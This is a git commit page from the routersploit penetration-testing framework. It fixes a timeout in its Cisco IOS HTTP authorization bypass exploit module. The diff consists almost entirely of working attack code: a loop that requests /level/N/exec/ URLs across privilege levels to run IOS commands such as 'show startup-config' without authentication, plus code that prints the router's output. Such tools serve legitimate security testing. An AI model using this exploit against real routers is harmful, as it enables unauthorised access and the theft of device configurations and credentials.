Fixing Timeout issue - Cisco IOS HTTP Auth Bypass (threat9#241)

* Fixing Timeout issue * Fixing style issues
ampg99 · Apr 23, 2017 · 7d7a2ce · 7d7a2ce
1 parent fd77312
commit 7d7a2ce
Showing 1 changed file with 14 additions and 10 deletions.
diff --git a/routersploit/modules/exploits/cisco/ios_http_authorization_bypass.py b/routersploit/modules/exploits/cisco/ios_http_authorization_bypass.py
@@ -39,16 +39,6 @@ class Exploit(exploits.Exploit):
     show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
     access_level = None
 
-    @mute
-    def check(self):
-        for num in range(16, 100):
-            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
-            response = http_request(method="GET", url=url)
-            if response is not None and response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
-                self.access_level = num
-                return True  # target is vulnerable
-        return False  # target is not vulnerable
-
     def run(self):
         if self.check():
             print_success("Target is vulnerable")
@@ -62,3 +52,17 @@ def run(self):
                 print_info(re.sub('<[^<]+?>', '', response.text))
         else:
             print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        for num in range(16, 100):
+            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
+            response = http_request(method="GET", url=url)
+            if response is None:  # target does not respond
+                break
+
+            if response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
+                self.access_level = num
+                return True  # target is vulnerable
+
+        return False  # target is not vulnerable